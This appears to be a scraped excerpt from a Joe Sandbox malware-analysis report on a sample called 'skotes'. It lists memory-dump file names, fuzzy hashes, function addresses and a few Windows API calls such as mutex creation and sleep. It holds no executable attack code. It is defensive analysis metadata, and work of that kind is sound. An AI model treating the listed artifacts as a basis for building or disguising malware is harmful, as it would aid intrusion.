Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 7170ca12a35814ce703f05c85dee7dead8445e10cae0883f46114642067af877
Instruction ID: c2bd520f1c2cf22cd20575502e0f149bd5bf6b3bcf1e723bd71ef16c01f689d9
Opcode Fuzzy Hash: 7170ca12a35814ce703f05c85dee7dead8445e10cae0883f46114642067af877
Instruction Fuzzy Hash: 9E317B71B002018BEB08DB79DDC976DB776EBC5311F248718E814973D5C73559848766

Function 0095A7B7 Relevance: 4.6, APIs: 3, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0095A7BA
Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID:
API String ID: 396266464-0
Opcode ID: 3c159166b8efa3f98a3770e09393696e1a695f956727f43cef34da239f29f000
Instruction ID: cc2e13d1043938fea52e790504ff5b8dbcdb58788d5af56614ff811ba06893dd
Opcode Fuzzy Hash: 3c159166b8efa3f98a3770e09393696e1a695f956727f43cef34da239f29f000
Instruction Fuzzy Hash: 05318871B002008FEB08DB78DDC9BADB766EBC5321F208718E914973D5CB3599898726

Function 00986E4C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6caac6786ecb7dabd7074c43f0606f922d6f3fc3d0ccb6d6946ba5646b9ea582
Instruction ID: 2333425656c8150fe2920f8a232b2bb627f57d4dfa46176ee2cef17b146b1eca
Opcode Fuzzy Hash: 6caac6786ecb7dabd7074c43f0606f922d6f3fc3d0ccb6d6946ba5646b9ea582
Instruction Fuzzy Hash: 6221D8725052046BEB117BA8EC42B9F7729DF81374F200211FA642F3C1D770DE019761

Function 0095A960 Relevance: 3.0, APIs: 2, Instructions: 43sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,?), ref: 0095A963
CreateMutexA.KERNEL32(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: c3f41f0fad73ccbc277a37a9dd2bfa06feec26a322ae1231cbe8e1513ed69fca
Instruction ID: 1746901ce3185631a7d75f14be8570ecaa1fe4970160e17ca2b72d7b410e0e0c
Opcode Fuzzy Hash: c3f41f0fad73ccbc277a37a9dd2bfa06feec26a322ae1231cbe8e1513ed69fca
Instruction Fuzzy Hash: 5CE026542DC30099FA10FA6DBD82B2E329987C9711F214714EA24C62D48D6064454237

Function 00966D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00966D11
Sleep.KERNEL32(00007530), ref: 00966D25

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
